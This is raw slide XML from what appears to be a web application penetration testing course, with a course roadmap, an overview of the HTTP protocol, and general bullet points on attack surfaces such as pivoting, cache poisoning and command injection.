            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Usually, the application and its data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>And, those can be a vehicle for attacking the enterprise network behind the site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Allows pen tester to pivot through web application to gain access to critical intranet devices – verify that such attacks are allowed in scope</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The web site server architecture may also open attack vectors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Cache poisoning against proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Source code disclosure attacks against application servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Command injection against hybrid servers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41"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="152400"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1981200"/>
            <a:ext cx="8458200" cy="41148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Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'s View, Pen-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Testing, &amp; Scoping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 Cont.</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Capture the Flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="5194300" y="152400"/>
            <a:ext cx="520700" cy="6248400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 328"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 328"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 328"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 328 w 328"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="328" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="1445"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="963"/>
                  <a:pt x="219" y="482"/>
                  <a:pt x="328" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="328" y="3984"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="219" y="3105"/>
                  <a:pt x="109" y="2324"/>
                  <a:pt x="0" y="1445"/>
                </a:cubicBez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
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="152400"/>
            <a:ext cx="3276600" cy="6705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eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" i="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Why the Web?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Pen Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web Site Server Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> The HTTP Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTP Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>HTTP Status Codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>WebSockets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Examining HTTP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Requests and Responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Session Tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Analyzing HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SamuraiWTF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Penetration Testing Types and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Pen Test Components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Reporting and Presenting Findings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Attack Methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Types of Flaws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>JavaScript for Pen Testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Statements, Variables,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Functions, &amp; Events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> The DOM, Methods, and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Properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> AJAX and XMLHttpRequest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> JavaScript Exercise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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTP Protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1661160"/>
            <a:ext cx="8610600" cy="4434840"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Hypertext Transfer Protocol (HTTP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It is a request/response protocol using a reliable transport</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Typically TCP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTP/1.1 is defined in RFC 2616</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>1.1 changes many things from 1.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Better caching support</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Designed to be extended as needs change</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Bandwidth optimization changes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Host: header field is important to security testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Scripted and manual requests require it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTP 2.0 is currently being drafted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Proposed as a binary protocol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ounded Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6704390" y="2482850"/>
            <a:ext cx="1524000" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1666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round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a14:hiddenLine>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34819" name="Rounded Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6704390" y="3778250"/>
            <a:ext cx="762000" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1666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round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a14:hiddenLine>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34820" name="Rounded Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6704390" y="5149850"/>
            <a:ext cx="2133600" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1666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round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a14:hiddenLine>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34821" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
